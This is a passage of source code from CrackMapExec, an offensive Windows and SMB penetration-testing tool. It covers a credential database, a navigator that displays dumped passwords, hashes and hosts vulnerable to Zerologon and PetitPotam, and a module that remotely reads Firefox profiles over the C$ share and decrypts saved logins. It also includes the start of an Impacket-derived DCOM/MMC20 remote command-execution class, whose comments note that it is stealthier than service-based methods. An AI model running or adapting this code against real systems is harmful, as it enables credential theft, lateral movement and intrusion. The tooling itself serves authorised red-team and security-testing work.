# inserted_id = inserted_result.id
cme_logger.debug(f"add_dpapi_secrets(host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, password={password}, url={url})")
def get_dpapi_secrets(
self,
filter_term=None,
host: str = None,
dpapi_type: str = None,
windows_user: str = None,
username: str = None,
url: str = None,
):
"""
Get dpapi secrets from cmedb
"""
q = select(self.DpapiSecrets)
if self.is_dpapi_secret_valid(filter_term):
q = q.filter(self.DpapiSecrets.c.id == filter_term)
results = self.conn.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
elif host:
q = q.filter(self.DpapiSecrets.c.host == host)
results = self.conn.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
elif dpapi_type:
q = q.filter(func.lower(self.DpapiSecrets.c.dpapi_type) == func.lower(dpapi_type))
elif windows_user:
like_term = func.lower(f"%{windows_user}%")
q = q.filter(func.lower(self.DpapiSecrets.c.windows_user).like(like_term))
elif username:
like_term = func.lower(f"%{username}%")
q = q.filter(func.lower(self.DpapiSecrets.c.windows_user).like(like_term))
elif url:
q = q.filter(func.lower(self.DpapiSecrets.c.url) == func.lower(url))
results = self.conn.execute(q).all()
cme_logger.debug(f"get_dpapi_secrets(filter_term={filter_term}, host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, url={url}) => {results}")
return results
def add_loggedin_relation(self, user_id, host_id):
relation_query = select(self.LoggedinRelationsTable).filter(
self.LoggedinRelationsTable.c.userid == user_id,
self.LoggedinRelationsTable.c.hostid == host_id,
)
results = self.conn.execute(relation_query).all()
# only add one if one doesn't already exist
if not results:
relation = {"userid": user_id, "hostid": host_id}
try:
cme_logger.debug(f"Inserting loggedin_relations: {relation}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
self.conn.execute(q, [relation]) # .scalar()
inserted_id_results = self.get_loggedin_relations(user_id, host_id)
cme_logger.debug(f"Checking if relation was added: {inserted_id_results}")
return inserted_id_results[0].id
except Exception as e:
cme_logger.debug(f"Error inserting LoggedinRelation: {e}")
def get_loggedin_relations(self, user_id=None, host_id=None):
q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
if user_id:
q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)
if host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
results = self.conn.execute(q).all()
return results
def remove_loggedin_relations(self, user_id=None, host_id=None):
q = delete(self.LoggedinRelationsTable)
if user_id:
q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)
elif host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
self.conn.execute(q)
def get_checks(self):
q = select(self.ConfChecksTable)
return self.conn.execute(q).all()
def get_check_results(self):
q = select(self.ConfChecksResultsTable)
return self.conn.execute(q).all()
def insert_data(self, table, select_results=[], **new_row):
"""
Insert a new row in the given table.
Basically it's just a more generic version of add_host
"""
results = []
updated_ids = []
# Create new row
if not select_results:
results = [new_row]
# Update existing row data
else:
for row in select_results:
row_data = row._asdict()
for column,value in new_row.items():
row_data[column] = value
# Only add data to be updated if it has changed
if row_data not in results:
results.append(row_data)
updated_ids.append(row_data['id'])
cme_logger.debug(f'Update data: {results}')
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(table) # .returning(table.c.id)
update_column = {col.name: col for col in q.excluded if col.name not in 'id'}
q = q.on_conflict_do_update(index_elements=table.primary_key, set_=update_column)
self.conn.execute(q, results) # .scalar()
# we only return updated IDs for now - when RETURNING clause is allowed we can return inserted
return updated_ids
def add_check(self, name, description):
"""
Check if this check item has already been added to the database, if not, add it in.
"""
q = select(self.ConfChecksTable).filter(self.ConfChecksTable.c.name == name)
select_results = self.conn.execute(q).all()
context = locals()
new_row = dict(((column, context[column]) for column in ('name', 'description')))
updated_ids = self.insert_data(self.ConfChecksTable, select_results, **new_row)
if updated_ids:
cme_logger.debug(f"add_check() - Checks IDs Updated: {updated_ids}")
return updated_ids
def add_check_result(self, host_id, check_id, secure, reasons):
"""
Check if this check result has already been added to the database, if not, add it in.
"""
q = select(self.ConfChecksResultsTable).filter(self.ConfChecksResultsTable.c.host_id == host_id, self.ConfChecksResultsTable.c.check_id == check_id)
select_results = self.conn.execute(q).all()
context = locals()
new_row = dict(((column, context[column]) for column in ('host_id', 'check_id', 'secure', 'reasons')))
updated_ids = self.insert_data(self.ConfChecksResultsTable, select_results, **new_row)
if updated_ids:
cme_logger.debug(f"add_check_result() - Check Results IDs Updated: {updated_ids}")
return updated_ids
================================================
FILE: cme/protocols/smb/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.helpers.misc import validate_ntlm
from cme.cmedb import DatabaseNavigator, print_table, print_help
from termcolor import colored
import functools
help_header = functools.partial(colored, color='cyan', attrs=['bold'])
help_kw = functools.partial(colored, color='green', attrs=['bold'])
class navigator(DatabaseNavigator):
def display_creds(self, creds):
data = [["CredID", "Admin On", "CredType", "Domain", "UserName", "Password"]]
for cred in creds:
cred_id = cred[0]
domain = cred[1]
username = cred[2]
password = cred[3]
credtype = cred[4]
# pillaged_from = cred[5]
links = self.db.get_admin_relations(user_id=cred_id)
data.append(
[
cred_id,
str(len(links)) + " Host(s)",
credtype,
domain,
username,
password,
]
)
print_table(data, title="Credentials")
def display_groups(self, groups):
data = [
[
"GroupID",
"Domain",
"Name",
"RID",
"Enumerated Members",
"AD Members",
"Last Query Time",
]
]
for group in groups:
group_id = group[0]
domain = group[1]
name = group[2]
rid = group[3]
members = len(self.db.get_group_relations(group_id=group_id))
ad_members = group[4]
last_query_time = group[5]
data.append([group_id, domain, name, rid, members, ad_members, last_query_time])
print_table(data, title="Groups")
# pull/545
def display_hosts(self, hosts):
data = [
[
"HostID",
"Admins",
"IP",
"Hostname",
"Domain",
"OS",
"SMBv1",
"Signing",
"Spooler",
"Zerologon",
"PetitPotam",
]
]
for host in hosts:
host_id = host[0]
ip = host[1]
hostname = host[2]
domain = host[3]
try:
os = host[4].decode()
except:
os = host[4]
try:
smbv1 = host[6]
signing = host[7]
except IndexError:
smbv1 = ""
signing = ""
try:
spooler = host[8]
zerologon = host[9]
petitpotam = host[10]
except IndexError:
spooler = ""
zerologon = ""
petitpotam = ""
links = self.db.get_admin_relations(host_id=host_id)
data.append(
[
host_id,
str(len(links)) + " Cred(s)",
ip,
hostname,
domain,
os,
smbv1,
signing,
spooler,
zerologon,
petitpotam,
]
)
print_table(data, title="Hosts")
def display_shares(self, shares):
data = [["ShareID", "host", "Name", "Remark", "Read Access", "Write Access"]]
for share in shares:
share_id = share[0]
host_id = share[1]
name = share[3]
remark = share[4]
users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="r")
users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="w")
data.append(
[
share_id,
host_id,
name,
remark,
f"{len(users_r_access)} User(s)",
f"{len(users_w_access)} Users",
]
)
print_table(data)
def do_shares(self, line):
filter_term = line.strip()
if filter_term == "":
shares = self.db.get_shares()
self.display_shares(shares)
elif filter_term in ["r", "w", "rw"]:
shares = self.db.get_shares_by_access(line)
self.display_shares(shares)
else:
shares = self.db.get_shares(filter_term=filter_term)
if len(shares) > 1:
self.display_shares(shares)
elif len(shares) == 1:
share = shares[0]
share_id = share[0]
host_id = share[1]
name = share[3]
remark = share[4]
users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="r")
users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="w")
data = [["ShareID", "Name", "Remark"], [share_id, name, remark]]
print_table(data, title="Share")
host = self.db.get_hosts(filter_term=host_id)[0]
data = [
["HostID", "IP", "Hostname", "Domain", "OS", "DC"],
[host[0], host[1], host[2], host[3], host[4], host[5]],
]
print_table(data, title="Share Location")
if users_r_access:
data = [["CredID", "CredType", "Domain", "UserName", "Password"]]
for user in users_r_access:
userid = user[0]
creds = self.db.get_credentials(filter_term=userid)
for cred in creds:
data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])
print_table(data, title="Users(s) with Read Access")
if users_w_access:
data = [["CredID", "CredType", "Domain", "UserName", "Password"]]
for user in users_w_access:
userid = user[0]
creds = self.db.get_credentials(filter_term=userid)
for cred in creds:
data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])
print_table(data, title="Users(s) with Write Access")
def help_shares(self):
help_string = """
shares [filter_term]
By default prints all shares
Can use a filter term to filter shares
"""
print_help(help_string)
def do_groups(self, line):
filter_term = line.strip()
if filter_term == "":
groups = self.db.get_groups()
self.display_groups(groups)
else:
groups = self.db.get_groups(filter_term=filter_term)
if len(groups) > 1:
self.display_groups(groups)
elif len(groups) == 1:
data = [
[
"GroupID",
"Domain",
"Name",
"RID",
"Enumerated Members",
"AD Members",
"Last Query Time",
]
]
for group in groups:
data.append(
[
group[0],
group[1],
group[2],
group[3],
len(self.db.get_group_relations(group_id=group[0])),
group[4],
group[5],
]
)
print_table(data, title="Group")
data = [
[
"CredID",
"CredType",
"Pillaged From HostID",
"Domain",
"UserName",
"Password",
]
]
for group in groups:
members = self.db.get_group_relations(group_id=group[0])
for member in members:
_, userid, _ = member
creds = self.db.get_credentials(filter_term=userid)
for cred in creds:
data.append([cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]])
print_table(data, title="Member(s)")
def help_groups(self):
help_string = """
groups [filter_term]
By default prints all groups
Can use a filter term to filter groups
"""
print_help(help_string)
def do_hosts(self, line):
filter_term = line.strip()
if filter_term == "":
hosts = self.db.get_hosts()
self.display_hosts(hosts)
else:
hosts = self.db.get_hosts(filter_term=filter_term)
if len(hosts) > 1:
self.display_hosts(hosts)
elif len(hosts) == 1:
data = [
[
"HostID",
"IP",
"Hostname",
"Domain",
"OS",
"DC",
"SMBv1",
"Signing",
"Spooler",
"Zerologon",
"PetitPotam",
]
]
host_id_list = []
for host in hosts:
host_id = host[0]
host_id_list.append(host_id)
ip = host[1]
hostname = host[2]
domain = host[3]
try:
os = host[4].decode()
except:
os = host[4]
try:
dc = host[5]
except IndexError:
dc = ""
try:
smbv1 = host[6]
signing = host[7]
except IndexError:
smbv1 = ""
signing = ""
try:
spooler = host[8]
zerologon = host[9]
petitpotam = host[10]
except IndexError:
spooler = ""
zerologon = ""
petitpotam = ""
data.append(
[
host_id,
ip,
hostname,
domain,
os,
dc,
smbv1,
signing,
spooler,
zerologon,
petitpotam,
]
)
print_table(data, title="Host")
data = [["CredID", "CredType", "Domain", "UserName", "Password"]]
for host_id in host_id_list:
links = self.db.get_admin_relations(host_id=host_id)
for link in links:
link_id, cred_id, host_id = link
creds = self.db.get_credentials(filter_term=cred_id)
for cred in creds:
data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])
print_table(data, title="Credential(s) with Admin Access")
def do_wcc(self, line):
valid_columns = {
'ip':'IP',
'hostname':'Hostname',
'check':'Check',
'description':'Description',
'status':'Status',
'reasons':'Reasons'
}
line = line.strip()
if line.lower() == 'full':
columns_to_display = list(valid_columns.values())
else:
requested_columns = line.split(' ')
columns_to_display = list(valid_columns[column.lower()] for column in requested_columns if column.lower() in valid_columns)
results = self.db.get_check_results()
self.display_wcc_results(results, columns_to_display)
def display_wcc_results(self, results, columns_to_display=None):
data = [
[
"IP",
"Hostname",
"Check",
"Status"
]
]
if columns_to_display:
data = [columns_to_display]
checks = self.db.get_checks()
checks_dict = {}
for check in checks:
check = check._asdict()
checks_dict[check['id']] = check
for (result_id, host_id, check_id, secure, reasons) in results:
status = 'OK' if secure else 'KO'
host = self.db.get_hosts(host_id)[0]._asdict()
check = checks_dict[check_id]
row = []
for column in data[0]:
if column == 'IP':
row.append(host['ip'])
if column == 'Hostname':
row.append(host['hostname'])
if column == 'Check':
row.append(check['name'])
if column == 'Description':
row.append(check['description'])
if column == 'Status':
row.append(status)
if column == 'Reasons':
row.append(reasons)
data.append(row)
print_table(data, title="Windows Configuration Checks")
def help_wcc(self):
help_string = f"""
{help_header('USAGE')}
{help_header('wcc')} [{help_kw('full')}]
{help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...
{help_header('DESCRIPTION')}
Display Windows Configuration Checks results
{help_header('wcc')} [{help_kw('full')}]
If full is provided, display all columns. Otherwise, display IP, Hostname, Check and Status
{help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...
Display only the requested columns (case-insensitive)
"""
print_help(help_string)
def help_hosts(self):
help_string = """
hosts [dc|spooler|zerologon|petitpotam|filter_term]
By default prints all hosts
Table format:
| 'HostID', 'IP', 'Hostname', 'Domain', 'OS', 'DC', 'SMBv1', 'Signing', 'Spooler', 'Zerologon', 'PetitPotam' |
Subcommands:
dc - list all domain controllers
spooler - list all hosts with Spooler service enabled
zerologon - list all hosts vulnerable to zerologon
petitpotam - list all hosts vulnerable to petitpotam
filter_term - filters hosts with filter_term
If a single host is returned (e.g. `hosts 15`, it prints the following tables:
Host | 'HostID', 'IP', 'Hostname', 'Domain', 'OS', 'DC', 'SMBv1', 'Signing', 'Spooler', 'Zerologon', 'PetitPotam' |
Credential(s) with Admin Access | 'CredID', 'CredType', 'Domain', 'UserName', 'Password' |
Otherwise, it prints the default host table from a `like` query on the `ip` and `hostname` columns
"""
print_help(help_string)
def do_dpapi(self, line):
filter_term = line.strip()
if filter_term == "":
secrets = self.db.get_dpapi_secrets()
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
elif filter_term.split()[0].lower() == "browser":
secrets = self.db.get_dpapi_secrets(dpapi_type="MSEDGE")
secrets += self.db.get_dpapi_secrets(dpapi_type="GOOGLE CHROME")
secrets += self.db.get_dpapi_secrets(dpapi_type="IEX")
secrets += self.db.get_dpapi_secrets(dpapi_type="FIREFOX")
if len(secrets) > 0:
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
elif filter_term.split()[0].lower() == "chrome":
secrets = self.db.get_dpapi_secrets(dpapi_type="GOOGLE CHROME")
if len(secrets) > 0:
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
elif filter_term.split()[0].lower() == "msedge":
secrets = self.db.get_dpapi_secrets(dpapi_type="MSEDGE")
if len(secrets) > 0:
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
elif filter_term.split()[0].lower() == "credentials":
secrets = self.db.get_dpapi_secrets(dpapi_type="CREDENTIAL")
if len(secrets) > 0:
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
elif filter_term.split()[0].lower() == "iex":
secrets = self.db.get_dpapi_secrets(dpapi_type="IEX")
if len(secrets) > 0:
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
elif filter_term.split()[0].lower() == "firefox":
secrets = self.db.get_dpapi_secrets(dpapi_type="FIREFOX")
if len(secrets) > 0:
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
else:
secrets = self.db.get_dpapi_secrets(filter_term=filter_term)
if len(secrets) > 0:
secrets.insert(
0,
[
"ID",
"Host",
"DPAPI Type",
"Windows User",
"Username",
"Password",
"URL",
],
)
print_table(secrets, title="DPAPI Secrets")
def help_dpapi(self):
help_string = """
dpapi [browser|chrome|msedge|credentials|iex|firefox|filter_term]
By default prints all dpapi dumped secrets
Table format:
| 'ID', 'Host', 'DPAPI Type', 'Windows User', 'Username', 'Password', 'URL' |
Subcommands:
browser - list all secrets dumped from browser
chrome - list all secrets dumped from chrome
msedge - list all secrets dumped from microsoft edge
credentials - list all secrets dumped from credential manager (user and system)
iex - list all secrets dumped from Internet Explorer
firefox - list all secrets dumped from Firefox
filter_term - filters dpapi secrets with filter_term
"""
print_help(help_string)
def do_creds(self, line):
filter_term = line.strip()
if filter_term == "":
creds = self.db.get_credentials()
self.display_creds(creds)
elif filter_term.split()[0].lower() == "add":
# add format: "domain username password
args = filter_term.split()[1:]
if len(args) == 3:
domain, username, password = args
if validate_ntlm(password):
self.db.add_credential("hash", domain, username, password)
else:
self.db.add_credential("plaintext", domain, username, password)
else:
print("[!] Format is 'add domain username password")
return
elif filter_term.split()[0].lower() == "remove":
args = filter_term.split()[1:]
if len(args) != 1:
print("[!] Format is 'remove '")
return
else:
self.db.remove_credentials(args)
self.db.remove_admin_relation(user_ids=args)
elif filter_term.split()[0].lower() == "plaintext":
creds = self.db.get_credentials(cred_type="plaintext")
self.display_creds(creds)
elif filter_term.split()[0].lower() == "hash":
creds = self.db.get_credentials(cred_type="hash")
self.display_creds(creds)
else:
creds = self.db.get_credentials(filter_term=filter_term)
if len(creds) != 1:
self.display_creds(creds)
elif len(creds) == 1:
data = [
[
"CredID",
"CredType",
"Pillaged From HostID",
"Domain",
"UserName",
"Password",
]
]
cred_id_list = []
for cred in creds:
cred_id_list.append(cred[0])
data.append([cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]])
print_table(data, title="Credential(s)")
data = [["GroupID", "Domain", "Name"]]
for cred_id in cred_id_list:
links = self.db.get_group_relations(user_id=cred_id)
for link in links:
link_id, user_id, group_id = link
groups = self.db.get_groups(group_id)
for group in groups:
group_id = group[0]
domain = group[1]
name = group[2]
data.append([group_id, domain, name])
print_table(data, title="Member of Group(s)")
data = [["HostID", "IP", "Hostname", "Domain", "OS"]]
for cred_id in cred_id_list:
links = self.db.get_admin_relations(user_id=cred_id)
for link in links:
link_id, cred_id, host_id = link
hosts = self.db.get_hosts(host_id)
for host in hosts:
data.append([host[0], host[1], host[2], host[3], host[4]])
print_table(data, title="Admin Access to Host(s)")
def help_creds(self):
help_string = """
creds [add|remove|plaintext|hash|filter_term]
By default prints all creds
Table format:
| 'CredID', 'Admin On', 'CredType', 'Domain', 'UserName', 'Password' |
Subcommands:
add - format: "add domain username password "
remove - format: "remove "
plaintext - prints plaintext creds
hash - prints hashed creds
filter_term - filters creds with filter_term
If a single credential is returned (e.g. `creds 15`, it prints the following tables:
Credential(s) | 'CredID', 'CredType', 'Pillaged From HostID', 'Domain', 'UserName', 'Password' |
Member of Group(s) | 'GroupID', 'Domain', 'Name' |
Admin Access to Host(s) | 'HostID', 'IP', 'Hostname', 'Domain', 'OS'
Otherwise, it prints the default credential table from a `like` query on the `username` column
"""
print_help(help_string)
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you" " want to run this? (y/n): ") == "y":
self.db.clear_database()
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
def complete_hosts(self, text, line):
"""
Tab-complete 'hosts' commands.
"""
commands = ("add", "remove", "dc")
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_creds(self, text, line):
"""
Tab-complete 'creds' commands.
"""
commands = ("add", "remove", "hash", "plaintext")
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
================================================
FILE: cme/protocols/smb/firefox.py
================================================
#!/usr/bin/env python3
from base64 import b64decode
from binascii import unhexlify
from hashlib import pbkdf2_hmac, sha1
import hmac
import json
import ntpath
import sqlite3
import tempfile
from Cryptodome.Cipher import AES, DES3
from pyasn1.codec.der import decoder
from dploot.lib.smb import DPLootSMBConnection
CKA_ID = unhexlify("f8000000000000000000000000000001")
class FirefoxData:
def __init__(self, winuser: str, url: str, username: str, password: str):
self.winuser = winuser
self.url = url
self.username = username
self.password = password
class FirefoxTriage:
"""
Firefox by @zblurx
Inspired by firefox looting from DonPAPI
https://github.com/login-securite/DonPAPI
"""
firefox_generic_path = "Users\\{}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
share = "C$"
false_positive = (
".",
"..",
"desktop.ini",
"Public",
"Default",
"Default User",
"All Users",
)
def __init__(self, target, logger, conn: DPLootSMBConnection = None):
self.target = target
self.logger = logger
self.conn = conn
def upgrade_connection(self, connection=None):
self.conn = DPLootSMBConnection(self.target)
if connection is not None:
self.conn.smb_session = connection
else:
self.conn.connect()
def run(self):
if self.conn is None:
self.upgrade_connection()
firefox_data = []
# list users
users = self.get_users()
for user in users:
try:
directories = self.conn.remote_list_dir(share=self.share, path=self.firefox_generic_path.format(user))
except Exception as e:
if "STATUS_OBJECT_PATH_NOT_FOUND" in str(e):
continue
self.logger.debug(e)
if directories is None:
continue
for d in [d for d in directories if d.get_longname() not in self.false_positive and d.is_directory() > 0]:
try:
logins_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\logins.json"
logins_data = self.conn.readFile(self.share, logins_path)
if logins_data is None:
continue # No logins.json file found
logins = self.get_login_data(logins_data=logins_data)
if len(logins) == 0:
continue # No logins profile found
key4_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\key4.db"
key4_data = self.conn.readFile(self.share, key4_path, bypass_shared_violation=True)
if key4_data is None:
continue
key = self.get_key(key4_data=key4_data)
if key is None and self.target.password != "":
key = self.get_key(
key4_data=key4_data,
master_password=self.target.password.encode(),
)
if key is None:
continue
for username, pwd, host in logins:
decoded_username = self.decrypt(key=key, iv=username[1], ciphertext=username[2]).decode("utf-8")
password = self.decrypt(key=key, iv=pwd[1], ciphertext=pwd[2]).decode("utf-8")
if password is not None and decoded_username is not None:
firefox_data.append(
FirefoxData(
winuser=user,
url=host,
username=decoded_username,
password=password,
)
)
except Exception as e:
if "STATUS_OBJECT_PATH_NOT_FOUND" in str(e):
continue
self.logger.exception(e)
return firefox_data
def get_login_data(self, logins_data):
json_logins = json.loads(logins_data)
if "logins" not in json_logins:
return [] # No logins key in logins.json file
logins = [
(
self.decode_login_data(row["encryptedUsername"]),
self.decode_login_data(row["encryptedPassword"]),
row["hostname"],
)
for row in json_logins["logins"]
]
return logins
def get_key(self, key4_data, master_password=b""):
fh = tempfile.NamedTemporaryFile()
fh.write(key4_data)
fh.seek(0)
db = sqlite3.connect(fh.name)
cursor = db.cursor()
cursor.execute("SELECT item1,item2 FROM metadata WHERE id = 'password';")
row = next(cursor)
if row:
global_salt, master_password, _ = self.is_master_password_correct(key_data=row, master_password=master_password)
if global_salt:
try:
cursor.execute("SELECT a11,a102 FROM nssPrivate;")
for row in cursor:
if row[0]:
break
a11 = row[0]
a102 = row[1]
if a102 == CKA_ID:
decoded_a11 = decoder.decode(a11)
key = self.decrypt_3des(decoded_a11, master_password, global_salt)
if key is not None:
fh.close()
return key[:24]
except Exception as e:
self.logger.debug(e)
fh.close()
return b""
fh.close()
def is_master_password_correct(self, key_data, master_password=b""):
try:
entry_salt = b""
global_salt = key_data[0] # Item1
item2 = key_data[1]
decoded_item2 = decoder.decode(item2)
cleartext_data = self.decrypt_3des(decoded_item2, master_password, global_salt)
if cleartext_data != "password-check\x02\x02".encode():
return "", "", ""
return global_salt, master_password, entry_salt
except Exception as e:
self.logger.debug(e)
return "", "", ""
def get_users(self):
users = list()
users_dir_path = "Users\\*"
directories = self.conn.listPath(shareName=self.share, path=ntpath.normpath(users_dir_path))
for d in directories:
if d.get_longname() not in self.false_positive and d.is_directory() > 0:
users.append(d.get_longname())
return users
@staticmethod
def decode_login_data(data):
asn1data = decoder.decode(b64decode(data))
return (
asn1data[0][0].asOctets(),
asn1data[0][1][1].asOctets(),
asn1data[0][2].asOctets(),
)
@staticmethod
def decrypt(key, iv, ciphertext):
"""
Decrypt ciphered data (user / password) using the key previously found
"""
cipher = DES3.new(key=key, mode=DES3.MODE_CBC, iv=iv)
data = cipher.decrypt(ciphertext)
nb = data[-1]
try:
return data[:-nb]
except Exception:
return data
@staticmethod
def decrypt_3des(decoded_item, master_password, global_salt):
"""
User master key is also encrypted (if provided, the master_password could be used to encrypt it)
"""
# See http://www.drh-consultancy.demon.co.uk/key3.html
pbeAlgo = str(decoded_item[0][0][0])
if pbeAlgo == "1.2.840.113549.1.12.5.1.3": # pbeWithSha1AndTripleDES-CBC
entry_salt = decoded_item[0][0][1][0].asOctets()
cipher_t = decoded_item[0][1].asOctets()
# See http://www.drh-consultancy.demon.co.uk/key3.html
hp = sha1(global_salt + master_password).digest()
pes = entry_salt + "\x00".encode() * (20 - len(entry_salt))
chp = sha1(hp + entry_salt).digest()
k1 = hmac.new(chp, pes + entry_salt, sha1).digest()
tk = hmac.new(chp, pes, sha1).digest()
k2 = hmac.new(chp, tk + entry_salt, sha1).digest()
k = k1 + k2
iv = k[-8:]
key = k[:24]
cipher = DES3.new(key=key, mode=DES3.MODE_CBC, iv=iv)
return cipher.decrypt(cipher_t)
elif pbeAlgo == "1.2.840.113549.1.5.13": # pkcs5 pbes2
assert str(decoded_item[0][0][1][0][0]) == "1.2.840.113549.1.5.12"
assert str(decoded_item[0][0][1][0][1][3][0]) == "1.2.840.113549.2.9"
assert str(decoded_item[0][0][1][1][0]) == "2.16.840.1.101.3.4.1.42"
# https://tools.ietf.org/html/rfc8018#page-23
entry_salt = decoded_item[0][0][1][0][1][0].asOctets()
iteration_count = int(decoded_item[0][0][1][0][1][1])
key_length = int(decoded_item[0][0][1][0][1][2])
assert key_length == 32
k = sha1(global_salt + master_password).digest()
key = pbkdf2_hmac("sha256", k, entry_salt, iteration_count, dklen=key_length)
# https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6#l6.49
iv = b"\x04\x0e" + decoded_item[0][0][1][1][1].asOctets()
# 04 is OCTETSTRING, 0x0e is length == 14
encrypted_value = decoded_item[0][1].asOctets()
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_value)
if decrypted is not None:
return decrypted
else:
return None
================================================
FILE: cme/protocols/smb/mmcexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to wmiexec but executing commands through MMC.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
# in the event log that smbexec.py does when creating a service.
# Drawback is it needs DCOM, hence, I have to be able to access
# DCOM ports at the target machine.
#
# Original discovery by Matt Nelson (@enigma0x3):
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
#
# Author:
# beto (@agsolino)
#
# Reference for:
# DCOM
#
# ToDo:
# [ ] Kerberos auth not working, invalid_checksum is thrown. Most probably sequence numbers out of sync due to
# getInterface() method
#
from os.path import join as path_join
from time import sleep
from cme.connection import dcom_FirewallChecker
from cme.helpers.misc import gen_random_string
from impacket.dcerpc.v5.dcom.oaut import (
IID_IDispatch,
string_to_bin,
IDispatch,
DISPPARAMS,
DISPATCH_PROPERTYGET,
VARIANT,
VARENUM,
DISPATCH_METHOD,
)
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcomrt import (
OBJREF,
FLAGS_OBJREF_CUSTOM,
OBJREF_CUSTOM,
OBJREF_HANDLER,
OBJREF_EXTENDED,
OBJREF_STANDARD,
FLAGS_OBJREF_HANDLER,
FLAGS_OBJREF_STANDARD,
FLAGS_OBJREF_EXTENDED,
IRemUnknown2,
INTERFACE,
)
from impacket.dcerpc.v5.dtypes import NULL
class MMCEXEC:
def __init__(self, host, share_name, username, password, domain, smbconnection, share, hashes=None, logger=None, tries=None, timeout=None):
self.__host = host
self.__username = username
self.__password = password
self.__smbconnection = smbconnection
self.__domain = domain
self.__lmhash = ""
self.__nthash = ""
self.__share_name = share_name
self.__output = None
self.__outputBuffer = b""
self.__shell = "c:\\windows\\system32\\cmd.exe"
self.__pwd = "C:\\"
self.__quit = None
self.__executeShellCommand = None
self.__retOutput = True
self.__share = share
self.__dcom = None
self.__tries = tries
self.__timeout = timeout
self.logger = logger
if hashes is not None:
if hashes.find(":") != -1:
self.__lmhash, self.__nthash = hashes.split(":")
else:
self.__nthash = hashes
self.__dcom = DCOMConnection(
self.__host,
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
None,
oxidResolver=True,
)
try:
iInterface = self.__dcom.CoCreateInstanceEx(string_to_bin("49B2791A-B1AE-4C90-9B8E-E860BA07F889"), IID_IDispatch)
except:
# Make it force break function
self.__dcom.disconnect()
flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)
if not flag or not self.__stringBinding:
error_msg = f'MMCEXEC: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the option "--dcom-timeout". If it\'s still failing maybe something is blocking the RPC connection, try another exec method'
if not self.__stringBinding:
error_msg = "MMCEXEC: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
# Make it force break function
self.__dcom.disconnect()
iMMC = IDispatch(iInterface)
resp = iMMC.GetIDsOfNames(("Document",))
dispParams = DISPPARAMS(None, False)
dispParams["rgvarg"] = NULL
dispParams["rgdispidNamedArgs"] = NULL
dispParams["cArgs"] = 0
